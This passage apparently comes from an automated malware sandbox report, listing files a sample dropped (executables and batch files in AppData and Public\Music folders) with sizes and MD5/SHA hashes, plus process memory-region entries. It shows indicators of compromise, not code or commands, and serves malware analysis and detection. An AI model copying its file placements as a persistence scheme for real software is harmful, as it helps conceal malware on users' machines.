                                              ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

                                            • C:\Users\Admin\AppData\Roaming\WiDefault.exe

                                              Filesize

                                              86KB

                                              MD5

                                              394764dfa74ce250be386b93940a4439

                                              SHA1

                                              889ff161e9760d4fd66fcb18983ecba1082ae296

                                              SHA256

                                              8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a

                                              SHA512

                                              ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

                                            • C:\Users\Admin\AppData\Roaming\WiDefault.exe

                                              Filesize

                                              86KB

                                              MD5

                                              394764dfa74ce250be386b93940a4439

                                              SHA1

                                              889ff161e9760d4fd66fcb18983ecba1082ae296

                                              SHA256

                                              8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a

                                              SHA512

                                              ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

                                            • C:\Users\Public\Music\RunNihaiersion.exe

                                              Filesize

                                              5KB

                                              MD5

                                              123bdf05b4b261644ff4579b8bd78806

                                              SHA1

                                              d6ce6069ba2faed71c5626daf8094a7ac921848b

                                              SHA256

                                              9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631

                                              SHA512

                                              e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5

                                            • C:\Users\Public\Music\RunNihaiersion.exe

                                              Filesize

                                              5KB

                                              MD5

                                              123bdf05b4b261644ff4579b8bd78806

                                              SHA1

                                              d6ce6069ba2faed71c5626daf8094a7ac921848b

                                              SHA256

                                              9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631

                                              SHA512

                                              e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5

                                            • C:\Users\Public\Music\RunihaiVersion.exe

                                              Filesize

                                              5KB

                                              MD5

                                              05b73b535c4337c16fc3f039c1b30dc1

                                              SHA1

                                              8de245727efd7aaa7fa1a3662430e823b68cec0a

                                              SHA256

                                              6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de

                                              SHA512

                                              6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6

                                            • C:\Users\Public\Music\RunihaiVersion.exe

                                              Filesize

                                              5KB

                                              MD5

                                              05b73b535c4337c16fc3f039c1b30dc1

                                              SHA1

                                              8de245727efd7aaa7fa1a3662430e823b68cec0a

                                              SHA256

                                              6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de

                                              SHA512

                                              6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6

                                            • C:\Users\Public\Music\bes.bat

                                              Filesize

                                              672B

                                              MD5

                                              9947ba16f06abcff429e922c49790337

                                              SHA1

                                              bd24d00f50e0d63892fc641a1438551d577b6e50

                                              SHA256

                                              8683fbcb2068bf7759e1b221e2dc660757e96e2a23ac9404a541ba82fb9c4a4f

                                              SHA512

                                              2a8ace440d7ab8a3ae6f02a84b5f7c81872d09946752ec02ac1a0fc64d9e1cfcb891c935f11394e395c748fb5b0f8a320f71dac25fa0c19a8a87e688af49cd11

                                            • C:\Users\Public\Music\es.bat

                                              Filesize

                                              673B

                                              MD5

                                              b00ef4b757bc25a0f41c3d74961ff9a0

                                              SHA1

                                              cfdaca2c4c8f1fce33275361260b251d8d74173a

                                              SHA256

                                              417a75bfa635462b42c3509d826180f719593eacbe29778352461c28579ddd76

                                              SHA512

                                              259aef5462238ec388e469de0cbec03f057f536931680060835958a3028aef3a534a13e6f7c6ada6cea12cc520df09a1143ec79920bdd39cc0c875639ba2d93a

                                            • C:\Users\Public\Music\installer2.bat

                                              Filesize

                                              387B

                                              MD5

                                              50b98ed3895545b2b72b28966cfa2b0d

                                              SHA1

                                              bf98a58225c8ce199e48825624e793ee8e0ca3f8

                                              SHA256

                                              ac019bd8d7937f836b6039c3d0a33c8e75509fb0ab79ee41ec3171f0cb0e1591

                                              SHA512

                                              af1c1bb692280e89df2a92f6aedbb90d76e3017572723f1bcacd092ecfd07cb1b05ebb9eb4dc322628d0734f96c95cae0e360042162859e55af957009bf0acaa

                                            • C:\Users\Public\Music\israil.exe

                                              Filesize

                                              5KB

                                              MD5

                                              b65cd9956dfe1877c72ffe687fc632b4

                                              SHA1

                                              86c1bc804f2394bb0b20fa7434257786eb72e5bf

                                              SHA256

                                              561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0

                                              SHA512

                                              fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

                                            • C:\Users\Public\Music\israil.exe

                                              Filesize

                                              5KB

                                              MD5

                                              b65cd9956dfe1877c72ffe687fc632b4

                                              SHA1

                                              86c1bc804f2394bb0b20fa7434257786eb72e5bf

                                              SHA256

                                              561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0

                                              SHA512

                                              fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

                                            • C:\Users\Public\Music\israil2.exe

                                              Filesize

                                              5KB

                                              MD5

                                              e000e033786867fa9caa5d9d6728384a

                                              SHA1

                                              4313fddde6aba146cd3c3ddd42f2db36194ded10

                                              SHA256

                                              7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131

                                              SHA512

                                              3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96

                                            • C:\Users\Public\Music\israil2.exe

                                              Filesize

                                              5KB

                                              MD5

                                              e000e033786867fa9caa5d9d6728384a

                                              SHA1

                                              4313fddde6aba146cd3c3ddd42f2db36194ded10

                                              SHA256

                                              7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131

                                              SHA512

                                              3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96

                                            • C:\Users\Public\Music\uuac.bat

                                              Filesize

                                              108B

                                              MD5

                                              c0c5cf18ed5b12d0cf2e77312e553328

                                              SHA1

                                              9f594d79de6cd8d546a6b2869029ebbd59c4b93f

                                              SHA256

                                              197ad34574917cff1d33ae3789fecb0120797e99e652c9746704846ef4a1cc69

                                              SHA512

                                              508d0692ab6e648b0d6de9c29c2b4bd85edcf1e3046533f83cdb1d4f98be6b830ea3f185ef81037afd19d13156a3d528c15339608337b62842d32af24b11ca78

                                            • memory/664-136-0x00000000006F0000-0x00000000006F8000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/664-140-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/664-137-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/1148-6-0x00000000027D0000-0x00000000027E0000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/1148-9-0x0000000005640000-0x00000000056A6000-memory.dmp

                                              Filesize

                                              408KB

                                            • memory/1148-20-0x00000000058A0000-0x0000000005BF4000-memory.dmp

                                              Filesize

                                              3.3MB

                                            • memory/1148-21-0x0000000005D20000-0x0000000005D3E000-memory.dmp

                                              Filesize

                                              120KB

                                            • memory/1148-22-0x0000000005F80000-0x0000000005FCC000-memory.dmp

                                              Filesize

                                              304KB

                                            • memory/1148-23-0x00000000027D0000-0x00000000027E0000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/1148-24-0x0000000007350000-0x00000000079CA000-memory.dmp

                                              Filesize

                                              6.5MB

                                            • memory/1148-25-0x0000000006240000-0x000000000625A000-memory.dmp

                                              Filesize

                                              104KB

                                            • memory/1148-29-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/1148-19-0x00000000057F0000-0x0000000005856000-memory.dmp

                                              Filesize

                                              408KB

                                            • memory/1148-8-0x0000000004E70000-0x0000000004E92000-memory.dmp

                                              Filesize

                                              136KB

                                            • memory/1148-7-0x0000000004F20000-0x0000000005548000-memory.dmp

                                              Filesize

                                              6.2MB

                                            • memory/1148-5-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/1148-4-0x0000000002760000-0x0000000002796000-memory.dmp

                                              Filesize

                                              216KB

                                            • memory/2212-522-0x0000000000400000-0x0000000000420000-memory.dmp

                                              Filesize

                                              128KB

                                            • memory/2980-117-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/2980-132-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/2980-129-0x0000000005440000-0x0000000005450000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/2980-118-0x0000000005440000-0x0000000005450000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/3160-45-0x0000000004F40000-0x0000000004F50000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/3160-31-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/3160-32-0x0000000004F40000-0x0000000004F50000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/3160-33-0x0000000004F40000-0x0000000004F50000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/3160-43-0x0000000005D80000-0x00000000060D4000-memory.dmp

                                              Filesize

                                              3.3MB

                                            • memory/3160-48-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/4448-66-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/4448-1-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/4448-0-0x00000000006E0000-0x00000000006F6000-memory.dmp

                                              Filesize

                                              88KB

                                            • memory/4456-100-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/4456-87-0x0000000004910000-0x0000000004920000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4456-86-0x0000000004910000-0x0000000004920000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4456-85-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/4472-163-0x0000000000CE0000-0x0000000000CF0000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4472-178-0x0000000007600000-0x0000000007696000-memory.dmp

                                              Filesize

                                              600KB

                                            • memory/4472-165-0x0000000070570000-0x00000000705BC000-memory.dmp

                                              Filesize

                                              304KB

                                            • memory/4472-175-0x0000000006590000-0x00000000065AE000-memory.dmp

                                              Filesize

                                              120KB

                                            • memory/4472-149-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/4472-150-0x0000000000CE0000-0x0000000000CF0000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4472-151-0x0000000000CE0000-0x0000000000CF0000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4472-161-0x0000000005DD0000-0x0000000006124000-memory.dmp

                                              Filesize

                                              3.3MB

                                            • memory/4472-176-0x0000000007310000-0x00000000073B3000-memory.dmp

                                              Filesize

                                              652KB

                                            • memory/4472-177-0x00000000073E0000-0x00000000073EA000-memory.dmp

                                              Filesize

                                              40KB

                                            • memory/4472-179-0x0000000005A90000-0x0000000005AA1000-memory.dmp

                                              Filesize

                                              68KB

                                            • memory/4472-164-0x0000000007050000-0x0000000007082000-memory.dmp

                                              Filesize

                                              200KB

                                            • memory/4504-144-0x0000000000B30000-0x0000000000B38000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/4504-145-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/4504-148-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/4740-84-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/4740-81-0x0000000002BA0000-0x0000000002BB0000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4740-67-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/4740-79-0x0000000005B70000-0x0000000005EC4000-memory.dmp

                                              Filesize

                                              3.3MB

                                            • memory/4740-69-0x0000000002BA0000-0x0000000002BB0000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4740-68-0x0000000002BA0000-0x0000000002BB0000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/5084-50-0x0000000002870000-0x0000000002880000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/5084-49-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/5084-51-0x0000000002870000-0x0000000002880000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/5084-62-0x0000000002870000-0x0000000002880000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/5084-65-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/5104-116-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/5104-101-0x0000000074EE0000-0x0000000075690000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/5104-113-0x0000000003220000-0x0000000003230000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/5104-102-0x0000000003220000-0x0000000003230000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/5636-426-0x0000000000400000-0x0000000000412000-memory.dmp

                                              Filesize

                                              72KB

                                            • memory/5860-518-0x0000000000400000-0x0000000000412000-memory.dmp

                                              Filesize

                                              72KB

                                            • memory/5896-587-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-599-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-573-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-575-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-577-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-579-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-581-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-583-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-585-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-589-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-569-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-591-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-593-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-595-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-597-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-571-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-601-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-603-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-605-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-607-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-609-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-611-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-613-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-615-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-617-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-619-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-621-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-623-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-625-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-567-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB

                                            • memory/5896-566-0x00000000060D0000-0x0000000006168000-memory.dmp

                                              Filesize

                                              608KB